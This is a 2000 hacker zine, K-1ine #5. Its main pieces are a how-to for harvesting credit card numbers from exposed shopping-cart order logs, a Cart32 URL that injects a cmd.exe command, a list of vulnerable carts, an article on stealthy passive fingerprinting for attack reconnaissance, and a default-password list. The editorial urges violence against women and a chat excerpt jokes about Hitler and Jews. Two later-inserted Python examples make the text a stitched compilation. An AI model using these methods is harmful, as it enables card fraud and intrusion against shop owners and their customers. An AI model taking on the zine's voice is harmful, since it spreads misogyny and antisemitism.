

!;;;;::--==--::--==--::--:[                         ]:--::--==--::--==--::;;;;!
::                              	  			            ::
::									    ::
;: ^^.;>.;>.;>.^^.;>.;>.;>^^   K - 1 i n e  #5	 ^^.;>.;>.;>.^^.;>.;>.;>^^  :;
;;			       	   					    ;:
::			       Follow Me Down                     	    ::
`:==--::--==--::--==--::--==--::--==--::--==--::-- ]:--::--==--::--==--::--==:'
^									     ^										  	
^				 Summer 2000				     ^
^									     ^	

			Featuring...
			

	


p
e
e
k
a
b
o
o

.
.
.

=-=-
==
-=           -    .              -=                 =               =- -=  -
      =     ., . ,          -=-=-=-=-        =- -=        -= =-  =     =    -=
=     ,      .       =-


== -        , ,   ;; ;:  ;  ; / ; /   ; ; ; ; / ;/;/; / ; /  ; ;; 

    -     -      =  -           -= =  -     .,.      ,.          -=         =-
 =       =    -     .,.          ,  -    ,    ,.       ,           =- -=
 - -=   ,   ,        . .     .    .,             =- -=         =        .=,
,    , ., , .,   ,                     
									    


 Introduction --


Welcome once again for another edition of K-1ine zine. I am your writer/editor
Mr.T Clone, who is literally melting into his chair as he writes under the 
insane Canadian summer heat - 28 degrees (Celsius). At the present time I
am wondering to myself why in the hell I'm bothering to do this considering 
the circumstances; it must be the heat getting to my half-functional brain 
telling myself to do some writing or it's going to shut off completely. 

Yes yes yes, it's the summer of 2000. For some of you reading this it probably
feels like just yesterday when you were writing your final exams before
the summer of 69, BUT suddenly without warning the rocks of reality smash you
in the nose and you realize it's the summer of 2000...
the only tests you're going to be taking are those damn prostate exams. 
They are necessary believe it or not. Get your prostate exam done today
or tomorrow if you're a male baby boomer who hasn't thought about this. 

-[sidetracked]-

Argh I need a shower - a nice cool shower... mmm... *droowl*

Argh I hate you all. 

Enjoy this compilation of files that have been on my site for more than a week.
Enjoy it because I told you to.

For some real fancy dancey writings, go to www.iamhappyblue.com
For some high quality hacking/phreaking documentation, 
go to http://phrack.infonexus.com
 
For wholesome Canadian zine packed full of yummy goodness, keep on reading.

If your girl is on her rag and she's giving you shit, 
slap the bitch in the mouth!


-=-=- The Muthafuckin' New Skool; The Clone -=-=-

-

Contact --

Comments/Questions/Submissions: theclone@nettwerked.net
Check out my site: (Nettwerked) http://www.nettwerked.net
Shoot me an ICQ message: (UIN) 79198218


--


Shopping Cart Vulnerabilities - by PsychoSpy
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Sorry about this but it has to be done considering the seriousness
this text could bring along.


That's correct! It's the legal bull shit we HAVE to go through!
This text is for educational purposes only. Any illegal use of
the information contained in this text is highly discouraged.

The writer of this text takes no responsibilities for any actions
which are taken as a result of the following text.



Well here comes yet another text for me! I'm just in one of those
writing moods right now.

So, you want some credit cards to card stuff with huh? And nowadays
with the online transactions systems that they have in place, the 
credit card generators just don't work anymore! They actually verify
the credit card on an online database to make sure everything is 
correct! Damn eh!

Looking for a solution to this problem? Well my friend, I've got it
for you. Using the methods I will detail in this text, I have gotten
over 3,000 Credit Card numbers in less than 2 hours! Mind you I
usually just trade them to people for software, favours etc. it's 
still kinda cool.

So, we've all seen those small ma and pa style of online stores, right?
They have ALL got some sort of Shopping Cart type of CGI script, which
is almost always designed by some guy who knows nothing about security
and barely knows how to password protect. 

The biggest problem with these sites is that the programmers don't have
a clue what world readable means. So, what ends up happening is that
credit card numbers are left in directories, and files which are, duh,
world readable, and, in many cases, un-encrypted.

There are also some problems with a couple programs which allow anyone
to change the administrators password without knowing the original one
(administration password for the scripts).

So, on we go into the details of some different scripts and how we can
access the credit card numbers (along with address, zip, phone# etc.)

Listed at the end of this text are the various scripts which have been
found to set transaction (order) log files to a default of world 
readable.

So, the first attack I will outline is for the sites with the order log
being world readable problem. Here's what you do to find tons of credit
cards quickly.

1. Go to your favourite search engine
2. Type in the executable name, exposed directory name, or any other
   exposed files (like the order logs themselves)
3. Once the search pops up weed through these sites
4. If you type in an executable name, then once you're at the executable,
   erase the executable name, and insert the exposed directory, and order
   log.
OR
   If you searched for the order log then it's right there
OR 
   If you searched for the exposed directory, type in the name of the order
   log.
5. Save the order log to your hard drive, or any other storage device and you
   have REAL WORKING credit cards to use for whatever you please!
6. DON'T BE STUPID! OR YOU WILL GET CAUGHT! Exercise EXTREME caution if you 
   purchase anything with these. In fact, I HIGHLY suggest you DON'T.

The other attack is one that is specific to the WebCart32 program which is used
by many small-medium, and even some large, sites.

Search for any of these sites to gain targets. Then once you've found a site 
go to the undocumented URLs of:
http://charon/scripts/cart32.exe/cart32clientlist

This will give you a list of usernames and passwords for Cart32 Administrator
access to different clients on the server (NOTE: A client is basically a
shopping site). Mind you these passwords are hashed, but can still be
used in a creative way. An example of this is to embed the hashed password
into a specially crafted URL that would allow the attacker to prime the
server to run an arbitrary command when an order is confirmed:

http://charon/scripts/c32web.exe?TabName=Cart32%2B&Action=Save+Cart32%2B+Tab
&SaveTab=Cart32%2B&Client=foobar&ClientPassword=e%21U%23_%25%28%5D%5D%26%25*%2B-a
&Admin=&AdminPassword=&TabToSave=Cart32%2B&PlusTabToSave=Run+External+Program
&UseCMDLine=Yes&CMDLine=cmd.exe+%2Fc+dir+%3E+c%3A%5Cfile.txt

The above URL would set the cart's properties to spawn a shell, perform a 
directory listing and pipe the output to a file called file.txt on the
root of the C: drive when an order is confirmed. After doing this, the
attacker would then create an order and confirm it, thus executing the
command (NOTE: This specific URL would not work on any webserver, you need
to replace the password details and client info with the one for the site
you're working on, I think you get the idea).

The second vulnerability in this shopping cart system is that you can change 
the Admin password for the script, without knowing the original. 
This is done with another undocumented file at:
http://charon/scripts/c32web.exe/ChangeAdminPassword

Is that crazy stuff or what? I'm sorry, but this programmer must have been 
COMPLETELY out to lunch when he programmed this. Either that or he wanted
one hell of a lot of shopping sites to be at his whim.

Anyways, here's the list of known shopping carts with the world readable order log problem.

I am sure there are more out there, and I'm sure some of these have been fixed. 
Either way, there are still TONS of vulnerable sites out there.


Selena Sol's WebStore 1.0  http://www.extropia.com/
    Platforms: Win32 / *Nix  (Perl5)
    Executable: web_store.cgi
    Exposed Directory: Admin_files
    Exposed Order info: Admin_files/order.log
    Status: Commercial ($300)/ Demo available.
    PGP Option available?: Yes

Order Form v1.2  http://www.io.com/~rga/scripts/cgiorder.html
    Platforms: Win32 / *Nix  (Perl5)
    Executable: ?
    Exposed Directory: Varies, commonly "Orders" "order" "orders" etc..
    Exposed Order Info: order_log_v12.dat (also order_log.dat)
    Status: Shareware ($15/$25 registration fee)
    PGP Option available?: Unknown.

Seaside Enterprises EZMall 2000  http://www.ezmall2000.com/
    Platforms: Win32 / *Nix  (Perl5)
    Executable: mall2000.cgi
    Exposed Directory: mall_log_files
    Exposed Order Info: order.log
    Status: Commercial ($225.00+ options)
    PGP Option Available?: YES

QuikStore  http://www.quikstore.com/
    Platforms: Win32 / *Nix (Perl5)
    Executable: quikstore.cgi
    Exposed Order info: quikstore.cfg* (see note)
    Status: Commercial ($175.00+ depending on options)
    PGP Option Available?: Unknown.

    NOTE: Although the order information itself is secured behind an htaccess 
    name/pwd pair, the config file is not. The config file is world readable, 
    and contains the CLEAR TEXT of the ADMINS user id and password
    - rendering the entire shopping cart vulnerable to an intruder.
    QuikStore's "password protected Online Order Retrieval System" can be
    wide open to the world.  (Armed with the name and pwd, the web visitor
    IS the administrator of the shopping cart, and can view orders, change
    settings and order information - the works.)


PDGSoft's PDG Shopping Cart 1.5  http://www.pdgsoft.com/
    Platforms: Win32 / *Nix (C/C++(?))
    Executable: shopper.cgi
    Exposed Directory: PDG_Cart/  (may differ between installs)
    Exposed Order info: PDG_Cart/order.log
    Exposed Config info: PDG_Cart/shopper.conf (see note)
    Status: Commercial ($750+ options)
    PGP Option Available?: Unknown. (Couldn't get a yes or no outta them)

    NOTE:  if they renamed the order log, shopper.conf will tell you where
    it's at and what it was named - worse, shopper.conf exposes the clear
    text copy of Authnet_Login and Authnet_Password, which gives you full
    remote administrative access to the cart. shopper.conf is world
    readable and totally unsecured.


Mercantec's SoftCart http://www.mercantec.com/
    Platform: Win32 (*Nix?)
    Executable: SoftCart.exe (version unknown)
    Exposed Directory: /orders and /pw
    Exposed Order Info: Files ending in "/orders/*.olf"
    Exposed Config Info: /pw/storemgr.pw
                        (user ID and encrypted PW for store mgr?)
    PGP Option Available?: Unknown


Mountain Network Systems Inc. http://www.mountain-net.com
    Platform: ?
    Exposed Directories: /config, /orders (and others. They're all listed in
					     config-file)
    Exposed Order Info: orders.txt
    Exposed Config Info: mountain.cfg
    PGP Option Available?: Unknown
    Status: Commercial, ranging from $399 to $4650.


Cybercash 2.1.4 - http://www.cybercash.com
    Platforms: Sparc?
    Exposed directory: /smps-2.1.4-solaris-sparc/
    Exposed order info: Several files, as far as I can see. 
                        Many are located in the /db/credit directory.
    Whats worse: Exposed admin-password and configuration-files: admin.pw and
                 admin.conf.
    Status: commercial.


Perlshop

    Version?
    Platforms?
    Executable file: perlshop.cgi
    Exposed directory: /store/customers/, /store/temp_customers/
    Exposed orderinfo: Several files, eight-digit numbered names.
    Status: adverware. Only requirement is to display a "powered by perlshop"
                                                           - logo on page.



Well then, this is the end of another FINE file created by PsychoSpy 
(if I do say so myself).

I hope this file is useful to someone out there, and if anyone has any 
questions about this or any of my other files, please do not hesitate to
contact me. My contact info is below, and you can almost always catch me
at irc.2600.net #2600ca.

Anyways, greet'z go out to the usual people, The Clone, Enoch_Root, and all 
the guys at #2600ca and who are in the Canadian scene. 
Keep up the good work! Hail Non-Existent Crew!

-- PsychoSpy
   PsychoSpy@softhome.net
   ICQ#: 5057653
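
From the administrator's side, the exposure listed above can be checked on a server you run. The following is an added example, not part of PsychoSpy's text or of any of the named products: it walks a document root (the path is an assumption) looking for the order log, config and password file names given in the list, reports their permission problems, and shows that tightening the mode still leaves the file inside the web tree. The sample tree it builds is constructed.

```python
import fnmatch
import os
import stat
import tempfile

# Names of order logs, config files and password files, taken from the cart
# list in the article above.
SENSITIVE_PATTERNS = (
    "order.log", "order_log*.dat", "orders.txt", "*.olf",
    "quikstore.cfg", "shopper.conf", "mountain.cfg",
    "storemgr.pw", "admin.pw", "admin.conf",
)


def is_sensitive(filename):
    """True if the file name matches one of the patterns (case-insensitive)."""
    lowered = filename.lower()
    return any(fnmatch.fnmatchcase(lowered, pat) for pat in SENSITIVE_PATTERNS)


def audit_docroot(docroot):
    """Walk docroot and return sorted (relative_path, problems) findings."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(docroot):
        for name in filenames:
            full = os.path.join(dirpath, name)
            # Symlinks are skipped so that only real files are judged.
            if os.path.islink(full) or not is_sensitive(name):
                continue
            mode = os.lstat(full).st_mode
            # Anything under the document root can be requested over HTTP
            # unless the server is configured to deny it, whatever the mode.
            problems = ["inside document root"]
            if mode & stat.S_IROTH:
                problems.append("world-readable")
            if mode & stat.S_IWOTH:
                problems.append("world-writable")
            findings.append((os.path.relpath(full, docroot), problems))
    return sorted(findings)


def strip_group_other(docroot, findings):
    """Remove group/other permission bits from every file in findings."""
    for rel, _problems in findings:
        full = os.path.join(docroot, rel)
        os.chmod(full, stat.S_IMODE(os.lstat(full).st_mode) & ~0o077)


def build_sample_tree(root):
    """Create a constructed sample layout (not taken from any real site)."""
    layout = {
        "cgi-bin/Admin_files/order.log": 0o644,
        "cgi-bin/PDG_Cart/shopper.conf": 0o640,
        "orders/0001.olf": 0o666,
        "index.html": 0o644,
    }
    for rel, mode in layout.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as handle:
            handle.write("constructed sample\n")
        os.chmod(path, mode)
    return root


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        root = build_sample_tree(tmp)
        for rel, problems in audit_docroot(root):
            print(f"{rel}: {', '.join(problems)}")
```

A file that still reports "inside document root" after the mode is tightened needs to be moved out of the web tree or denied in the server configuration.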


---

-=-=-=-

You can close your windows 
lock your doors
leave me leaning on widows
sucking on whores

I know that ugly men in beautiful ties
can fool you with their business card lives
allow your finger into their pies
hide you from their wives

The internet told me so, 
and with a silly buffer overflow
I know where you were last night
that's right

You can call it done
say you never loved me
that we had our fun
and that was all it was meant to be
and that was all I was meant to be

but I've seen your personal emails
business men fetish she-males
selling you amongst themselves retail
I know you in perfect bitmap detail

the internet told me so
and with a silly buffer overflow
I know where you were last night
that's right
I know who you were last night.

-untoward


---


<seuss> poor jew-spotting technique, Alan. Slavic jews lack any distinguishing facial features.
<theclone> Hitler must of had a tough time with them Slavic jews
<seuss> Man... I sound like some sort of neo-nazi DIY racewar pamphlet.


Passive Fingerprinting - By PsychoSpy
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

So, here's the scenario. You found this sweet server that
you want to get into. Do you just jump right in and start
trying things? I sure hope not! Your first task should be
to gather information about the server. Unfortunately a lot
of the time when we do this the server figures out what
we're doing, and starts to keep tabs on us before we can even
get started, causing some serious misfortune to many a hacker.

Is there a solution? Sure there is! What's the solution you ask?
The solution is Passive Fingerprinting. With passive fingerprinting
you can ID a remote host, without them knowing!

So, now you want to know how to do it. Well, I guess that's the whole
point to this text so here we go!

With this method you can determine the operating system and a few
other characteristics of the remote host using nothing more than 
sniffer traces. Although it's not 100% accurate, you can get 
surprisingly good results. A proof of concept tool based on some of
the concepts which I'll talk about in this text, was developed by
Craig Smith. Also, the subterrain crew has developed siphon, a passive 
port mapping and OS fingerprinting tool.


Traditionally, fingerprinting of Operating Systems has been accomplished
by active tools like queso and nmap. These tools work on the principle that
every OS's IP stack has its own characteristics and idiosyncrasies. i.e. 
different operating systems respond differently to a variety of malformed 
packets. All that has to be done is to build a database on how the different
OS's respond to the different malformed packets.  Once this has been done, 
to determine the OS of a remote host/server all one has to do is send it a 
variety of malformed packets, figure out how it responds, and then compare 
the responses to those in the database.

Fyodor's nmap is the tool of choice when using this methodology, he has also 
written a highly detailed and interesting paper on this.


Now on to passive fingerprinting. Passive fingerprinting follows the same 
general concept but is implemented differently. Passive fingerprinting is
based on sniffer traces from the remote system. Instead of actively
querying the remote system, all one needs to do is capture packets sent
to and from the remote system. Based on the sniffer traces of these packets,
you can determine the OS of the remote system. 
Exactly as is done in active fingerprinting, passive is based on the idea
that every OS's IP stack has its own characteristics. By analyzing these
sniffer traces and IDing these differences, you can (fairly accurately)
determine the OS of the remote system.

Now you're asking what the signatures in the packets we look at are. 
So, we'll answer that now. There are four areas that we will look at to
figure out what OS is being used. There are more that can be used, but
these are the most used and basic.

- TTL - This is what the OS sets the Time To Live on the outbound packet
- Window Size - This is what the OS sets the Window Size at. (duh!)
- DF - Does the OS set the Don't Fragment bit?
- TOS - Does the OS set the Type of Service? If so, to what?

By analyzing these areas of a packet, you might be able to determine the 
remote OS. This method is not 100% accurate, and works better on some
OS's than others. No single signature can reliably tell you the remote OS.
However, by looking at several signatures and combining all of them, you can 
significantly increase the accuracy of IDing the remote system.

Just in case you don't completely get it yet, and would like it, I have 
included an example. Below is the sniffer trace of a system sending a packet. 
This system launched a mountd exploit against a, so I want to learn more 
about it. Yeah I know it's not a server we're attacking but it's the best 
example I could find. Let's pretend it's a server we're going to attack though.
Obviously we don't want to finger or nmap the box because that would give
us away immediately. Instead, I want to study the information passively.
This signature was captured using snort (a great sniffer.)


     04/20-21:41:48.129662 129.142.224.3:659 -> 172.16.1.107:604
     TCP TTL:45 TOS:0x0 ID:56257
     ***F**A* Seq: 0x9DD90553   Ack: 0xE3C65D7   Win: 0x7D78
   
   Based on our 4 criteria, we identify the following:
     * TTL: 45
     * Window Size: 0x7D78  (or 32120 in decimal)
     * DF: The Don't Fragment bit is set
     * TOS: 0x0


Since we now have this information, we compare this to a database of 
signatures. First, we take a look at the TTL used by the remote system.
From the trace above, as you can see, the TTL was set to 45. 
This means that it most likely went through 19 hops to reach us, so the
original TTL was set to 64. 

Based on this TTL, the box seems to be Linux or FreeBSD. 
The TTL is confirmed by doing a traceroute to the system. Obviously we're
concerned that the remote box will detect us, so we set our traceroute
time-to-live to be one or two hops less than the remote host (-m option).
For example in this case we would do a traceroute to the remote host, 
but using only 18 hops. This gives us the path info, without actually touching
the remote system.

What next? We move on and compare the Window Size. The window size is another
effective tool, more specifically what Window Size was used and how often the
size changes. In the example signature, we see it set at 0x7D78, which is
a default Window Size used in Linux. As another point, Linux, FreeBSD,
and Solaris tend to keep the same Window Size for a whole session.
However, Cisco Routers and Micro$oft Windows/NT Window Sizes are constantly 
changing. It has been found that Window Size is more accurate if taken into 
effect after the initial three-way handshake. For more info on Window Size, 
grab a copy of "TCP/IP Illustrated Volume 1" (a GREAT book if you're interested
in learning more about networking) in Chapter 20.
 
Unfortunately the DF bit has very little value to us. Most systems use the DF 
bit set so we're somewhat FUBAR on that account. But, it does make it somewhat 
easier to ID the few systems that do not use the DF flag (examples are SCO
and OpenBSD).

One thing to remember is that, just like Active Fingerprinting, 
Passive Fingerprinting has a few limitations. The first is that applications 
that build their own packets, will not use the same signatures as the OS.
Another is that it is pretty easy for a remote system to adjust the TTL,
Window Size, DF, and TOS settings on the packets.

As was said earlier, we are not limited to the four signatures which we 
discussed earlier. There are others that can be used, such as TCP or IP
options, initial sequence numbers, and IP Identification numbers. 
As an example, Cisco routers tend to start IP Ident numbers at 0, instead of 
randomly assigning them.

Another idea is that ICMP payloads can be used. Max Vision discusses using
ICMP payload type or TCP options for remote host identification.
Microsoft ICMP Request payloads are alphabetic, but Solaris or Linux ICMP 
Request payloads have alphabetic and symbolic characters. 

Passive fingerprinting is also a tool that servers will use to figure out 
who/what/where you are while making an attack if you aren't so stealthy.

As a conclusion all I can say is that as hackers we need every tool available
to us to keep us in the shadows. Why broadcast what we're trying to do to
the servers we're attacking if we can keep them in the dark, and keep
ourselves in a stealth like manner.


Greet'z go out to The Clone (YOU ROCK!!) and Enoch_Root.

This has been yet another fine production of the Non-Existent Crew (WE'RE
ALL CANADIAN EH!! ;-)

-- PsychoSpy
   PsychoSpy@softhome.net
   ICQ#: 5057653

   07.15.00
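
The TTL and window-size reasoning above, applied to the article's own snort trace, as an added example that is not part of PsychoSpy's text. The list of common initial TTLs and the two-entry signature table (holding only what the article states) are assumptions of the example; the DF bit is not parsed because the trace as printed does not show it.

```python
import re

# The snort trace exactly as printed in the article above.
TRACE = """\
04/20-21:41:48.129662 129.142.224.3:659 -> 172.16.1.107:604
TCP TTL:45 TOS:0x0 ID:56257
***F**A* Seq: 0x9DD90553   Ack: 0xE3C65D7   Win: 0x7D78
"""

# Assumption of this example: initial TTL values that IP stacks commonly use.
COMMON_INITIAL_TTLS = (32, 64, 128, 255)

# Only the associations the article states: an initial TTL of 64 suggests
# Linux or FreeBSD, and 0x7D78 is a default Linux window size.
# None means the article gives no value for that field.
ARTICLE_SIGNATURES = (
    {"os": "Linux", "initial_ttl": 64, "window": 0x7D78},
    {"os": "FreeBSD", "initial_ttl": 64, "window": None},
)


def parse_trace(text):
    """Extract TTL, TOS and window size from a snort-style packet dump."""
    ttl = re.search(r"\bTTL:(\d+)", text)
    tos = re.search(r"\bTOS:(0x[0-9A-Fa-f]+)", text)
    win = re.search(r"\bWin:\s*(0x[0-9A-Fa-f]+)", text)
    if not (ttl and tos and win):
        raise ValueError("trace is missing a TTL, TOS or Win field")
    return {
        "ttl": int(ttl.group(1)),
        "tos": int(tos.group(1), 16),
        "window": int(win.group(1), 16),
    }


def estimate_initial_ttl(observed_ttl):
    """Round the observed TTL up to the nearest common initial value.

    Returns (initial_ttl, hops). The estimate is wrong if the sender has
    changed its default TTL, which the article lists as a limitation.
    """
    if not 1 <= observed_ttl <= 255:
        raise ValueError("TTL must be between 1 and 255")
    for candidate in COMMON_INITIAL_TTLS:
        if observed_ttl <= candidate:
            return candidate, candidate - observed_ttl
    raise AssertionError("unreachable: 255 is the largest possible TTL")


def rank_candidates(fields):
    """Score each signature by how many of its known fields match."""
    initial_ttl, _hops = estimate_initial_ttl(fields["ttl"])
    ranked = []
    for sig in ARTICLE_SIGNATURES:
        score = 0
        if sig["initial_ttl"] == initial_ttl:
            score += 1
        if sig["window"] is not None and sig["window"] == fields["window"]:
            score += 1
        if score:
            ranked.append((sig["os"], score))
    # sorted() is stable, so ties keep the table order.
    return sorted(ranked, key=lambda item: -item[1])


if __name__ == "__main__":
    fields = parse_trace(TRACE)
    initial, hops = estimate_initial_ttl(fields["ttl"])
    print(f"TTL {fields['ttl']} -> initial {initial}, about {hops} hops")
    print(f"Window 0x{fields['window']:X} = {fields['window']} decimal")
    print("Candidates:", rank_candidates(fields))
```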

---



   Default Password List
   Version 3.00 Maintained by Eric Knight (knight@securityparadigm.com)
   Last Update:  July 6th, 2000
   
Updates Available at:  http://www.securityparadigm.com/defaultpw.htm
Protocol can be any network protocol name, or CONSOLE for requiring 
physical access or MULTI meaning any console connection

Manufacturer Product Revision Protocol User ID Password Access Level Comment
   3COM Office Connect ISDN Routers 5x0 Telnet? n/a PASSWORD Admin
   3COM adm (none)
   3COM admin synnet
   3COM debug synnet
   3COM manager manager
   3COM monitor monitor
   3COM read synnet
   3COM security security
   3COM tech tech
   3COM write synnet
   Advanced Integration BIOS Console n/a Advance Admin
   AMI PC BIOS Console n/a AM Admin
   AMI PC BIOS Console n/a AMI Admin
   AMI PC BIOS Console n/a A.M.I Admin
   AMI PC BIOS Console n/a AMI_SW Admin
   AMI PC BIOS Console n/a AMI?SW Admin
   AMI PC BIOS Console n/a aammii Admin
   AMI PC BIOS Console n/a AMI!SW Admin
   AMI PC BIOS Console n/a AMI.KEY Admin
   AMI PC BIOS Console n/a AMI.KEZ Admin
   AMI PC BIOS Console n/a AMI~ Admin
   AMI PC BIOS Console n/a AMIAMI Admin
   AMI PC BIOS Console n/a AMIDECOD Admin
   AMI PC BIOS Console n/a AMIPSWD Admin
   AMI PC BIOS Console n/a amipswd Admin
   AMI PC BIOS Console n/a AMISETUP Admin
   AMI PC BIOS Console n/a BIOSPASS Admin
   AMI PC BIOS Console n/a CMOSPWD Admin
   AMI PC BIOS Console n/a HEWITT RAND Admin
   Amptron BIOS Console n/a Polrty Admin
   AST BIOS Console n/a SnuFG5 Admin
   AT&T 3B2 Firmware Console n/a mcp Admin
   Autodesk Autocad Multi autocad autocad User
   AWARD BIOS Console n/a Award Admin
   AWARD BIOS Console n/a AWARD_SW Admin
   AWARD BIOS Console n/a SW_AWARD Admin
   AWARD BIOS Console n/a AWARD?SW Admin
   AWARD BIOS Console n/a lkwpeter Admin
   AWARD BIOS Console n/a LKWPETER Admin
   AWARD BIOS Console n/a j262 Admin
   AWARD BIOS Console n/a j256 Admin
   AWARD BIOS Console n/a ?award Admin
   AWARD BIOS Console n/a 01322222 Admin
   AWARD BIOS Console n/a 256256 Admin
   AWARD BIOS Console n/a 589589 Admin
   AWARD BIOS Console n/a 589721 Admin
   AWARD BIOS Console n/a admin Admin
   AWARD BIOS Console n/a alfarome Admin
   AWARD BIOS Console n/a aLLy Admin
   AWARD BIOS Console n/a aPAf Admin
   AWARD BIOS Console n/a award Admin
   AWARD BIOS Console n/a AWARD SW Admin
   AWARD BIOS Console n/a award.sw Admin
   AWARD BIOS Console n/a award_? Admin
   AWARD BIOS Console n/a award_ps Admin
   AWARD BIOS Console n/a AWARD_PW Admin
   AWARD BIOS Console n/a awkward Admin
   AWARD BIOS Console n/a BIOS Admin
   AWARD BIOS Console n/a biosstar Admin
   AWARD BIOS Console n/a biostar Admin
   AWARD BIOS Console n/a CONCAT Admin
   AWARD BIOS Console n/a condo Admin
   AWARD BIOS Console n/a CONDO Admin
   AWARD BIOS Console n/a CONDO, Admin
   AWARD BIOS Console n/a djonet Admin
   AWARD BIOS Console n/a efmukl Admin
   AWARD BIOS Console n/a g6PJ Admin
   AWARD BIOS Console n/a h6BB Admin
   AWARD BIOS Console n/a HELGA-S Admin
   AWARD BIOS Console n/a HEWITT RAND Admin
   AWARD BIOS Console n/a HLT Admin
   AWARD BIOS Console n/a j09F Admin
   AWARD BIOS Console n/a j322 Admin
   AWARD BIOS Console n/a j64 Admin
   AWARD BIOS Console n/a lkw peter Admin
   AWARD BIOS Console n/a lkwpeter Admin
   AWARD BIOS Console n/a PASSWORD Admin
   AWARD BIOS Console n/a SER Admin
   AWARD BIOS Console n/a setup Admin
   AWARD BIOS Console n/a SKY_FOX Admin
   AWARD BIOS Console n/a SWITCHES_SW Admin
   AWARD BIOS Console n/a Sxyz Admin
   AWARD BIOS Console n/a SZYX Admin
   AWARD BIOS Console n/a t0ch20x Admin
   AWARD BIOS Console n/a t0ch88 Admin
   AWARD BIOS Console n/a TTPTHA Admin
   AWARD BIOS Console n/a TzqF Admin
   AWARD BIOS Console n/a wodj Admin
   AWARD BIOS Console n/a ZAAADA Admin
   AWARD BIOS Console n/a zbaaaca Admin
   AWARD BIOS Console n/a zjaaadc Admin
   Axis NETCAM 200/240 root pass
   Bay Networks Router Manager (none) Admin
   Bay Networks Router User (none) User
   Bay Networks SuperStack II security security Admin
   Bay Networks Switch 350T n/a NetICs Admin
   Biostar BIOS Console n/a Biostar Admin
   Biostar BIOS Console n/a Q54arwms Admin
   Breezecom Breezecom Adapters 4.x n/a Super
   Breezecom Breezecom Adapters 3.x n/a Master
   Breezecom Breezecom Adapters 2.x n/a laflaf
   Cayman Cayman DSL n/a (none) Admin
   Cisco IOS cisco cisco
   Cisco IOS enable cisco IOS technically has no "default pw'
   Cisco IOS 2600 series n/a c but these are common misconfigurations
   Cisco IOS n/a cc
   Cisco IOS n/a cisco
   Cisco IOS n/a Cisco router
   Cisco CiscoWorks 2000 guest (none) User
   Cisco CiscoWorks 2000 admin cisco Admin
   Cisco ConfigMaker cmaker cmaker Admin
   Compaq BIOS n/a Compaq Admin
   Concord BIOS n/a last Admin
   Crystalview OutsideView 32 Crystal Admin
   CTX International BIOS n/a CTX_123 Admin
   CyberMax BIOS n/a Congress Admin
   Daewoo BIOS n/a Daewuu Admin
   Datacom BSASX/101 n/a letmein Admin
   Daytek BIOS n/a Daytec Admin
   Dell BIOS n/a Dell Admin
   Develcon Orbitor Default Console n/a BRIDGE Admin
   Develcon Orbitor Default Console n/a password Admin
   Dictaphone ProLog NETOP (none)
   Dictaphone ProLog NETWORK NETWORK
   Dictaphone ProLog PBX PBX
   Digicorp Router n/a BRIDGE Admin
   Digicorp Router n/a password Admin
   Digital Equipment BIOS n/a komprie Admin
   Digital Equipment DEC-10 1 syslib Admin
   Digital Equipment DEC-10 1 operator Admin
   Digital Equipment DEC-10 1 manager Admin
   Digital Equipment DEC-10 2 maintain Admin
   Digital Equipment DEC-10 2 syslib Admin
   Digital Equipment DEC-10 2 manager Admin
   Digital Equipment DEC-10 2 operator Admin
   Digital Equipment DEC-10 30 games User
   Digital Equipment DEC-10 5 games User
   Digital Equipment DEC-10 7 maintain User
   Digital Equipment DecServer n/a ACCESS Admin
   Digital Equipment DecServer n/a SYSTEM Admin
   Digital Equipment IRIS Multi accounting accounting Admin
   Digital Equipment IRIS Multi boss boss Admin
   Digital Equipment IRIS Multi demo demo User
   Digital Equipment IRIS Multi manager manager Admin
   Digital Equipment IRIS Multi PDP11 PDP11 User
   Digital Equipment IRIS Multi PDP8 PDP8 User
   Digital Equipment IRIS Multi software software User
   Digital Equipment RSX 1,1 SYSTEM Admin
   Digital Equipment RSX BATCH BATCH User
   Digital Equipment RSX SYSTEM MANAGER Admin
   Digital Equipment RSX SYSTEM SYSTEM Admin
   Digital Equipment RSX USER USER User
   Digital Equipment Terminal Server Port 7000 n/a access User
   Digital Equipment Terminal Server Port 7000 n/a system Admin
   Digital Equipment VMS Multi ALLIN1 ALLIN1
   Digital Equipment VMS Multi ALLIN1MAIL ALLIN1MAIL
   Digital Equipment VMS Multi ALLINONE ALLINONE
   Digital Equipment VMS Multi BACKUP BACKUP
   Digital Equipment VMS Multi DCL DCL
   Digital Equipment VMS Multi DECMAIL DECMAIL
   Digital Equipment VMS Multi DECNET DECNET
   Digital Equipment VMS Multi DECNET NONPRIV
   Digital Equipment VMS Multi DECNET DECNET
   Digital Equipment VMS Multi DEFAULT USER
   Digital Equipment VMS Multi DEFAULT DEFAULT
   Digital Equipment VMS Multi DEMO DEMO
   Digital Equipment VMS Multi FIELD FIELD
   Digital Equipment VMS Multi FIELD SERVICE
   Digital Equipment VMS Multi FIELD TEST
   Digital Equipment VMS Multi FIELD DIGITAL
   Digital Equipment VMS Multi GUEST GUEST
   Digital Equipment VMS Multi HELP HELP
   Digital Equipment VMS Multi HELPDESK HELPDESK
   Digital Equipment VMS Multi HOST HOST
   Digital Equipment VMS Multi HOST HOST
   Digital Equipment VMS Multi INFO INFO
   Digital Equipment VMS Multi INGRES INGRES
   Digital Equipment VMS Multi LINK LINK
   Digital Equipment VMS Multi MAILER MAILER
   Digital Equipment VMS Multi MBMANAGER MBMANAGER
   Digital Equipment VMS Multi MBWATCH MBWATCH
   Digital Equipment VMS Multi NETCON NETCON
   Digital Equipment VMS Multi NETMGR NETMGR
   Digital Equipment VMS Multi NETNONPRIV NETNONPRIV
   Digital Equipment VMS Multi NETPRIV NETPRIV
   Digital Equipment VMS Multi NETSERVER NETSERVER
   Digital Equipment VMS Multi NETSERVER NETSERVER
   Digital Equipment VMS Multi NETWORK NETWORK
   Digital Equipment VMS Multi NEWINGRES NEWINGRES
   Digital Equipment VMS Multi NEWS NEWS
   Digital Equipment VMS Multi OPERVAX OPERVAX
   Digital Equipment VMS Multi POSTMASTER POSTMASTER
   Digital Equipment VMS Multi PRIV PRIV
   Digital Equipment VMS Multi REPORT REPORT
   Digital Equipment VMS Multi RJE RJE
   Digital Equipment VMS Multi STUDENT STUDENT
   Digital Equipment VMS Multi SYS SYS
   Digital Equipment VMS Multi SYSMAINT SYSMAINT
   Digital Equipment VMS Multi SYSMAINT SERVICE
   Digital Equipment VMS Multi SYSMAINT DIGITAL
